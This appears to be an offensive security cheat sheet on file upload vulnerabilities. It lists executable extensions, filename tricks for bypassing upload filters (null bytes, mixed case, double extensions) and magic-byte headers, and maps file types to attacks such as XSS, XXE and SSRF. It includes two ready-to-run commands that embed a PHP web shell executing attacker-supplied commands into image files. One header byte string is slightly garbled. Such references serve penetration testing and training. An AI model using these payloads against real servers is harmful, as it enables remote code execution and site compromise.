๐Ÿ—ƒ๏ธfile upload vulnerability

File Upload Vulnerability Cheat Sheet

Methodology

Useful Extensions

PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module

Working in PHPv8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp

ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml

Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action

Coldfusion: .cfm, .cfml, .cfc, .dbm

Flash: .swf

Perl: .pl, .cgi

Erlang Yaws Web Server: .yaws

Bypass File Extension Checks

pHp, .pHP5, .PhAr ...

file.png.php
file.png.Php5

file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....

file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png

file.png.jpg.php
file.php%00.png%00.jpg

file.php.png

Bypass Content-Type, Magic Number

Content Type Worldlist

Bypass Magic Number

exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
echo '<?php system($_REQUEST['cmd']); ?>' >> img.png

Tools

Upload Bypass

From File upload to other vulnerabilities

ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
SVG: Stored XSS / SSRF / XXE
GIF: Stored XSS / SSRF
CSV: CSV injection
XML: XXE
AVI: LFI / SSRF
HTML / JS : HTML injection / XSS / Open redirect
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE

Magic Header Bytes

PNG: "\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["
JPG: "\xff\xd8\xff"

References

HackTricks Book

Last updated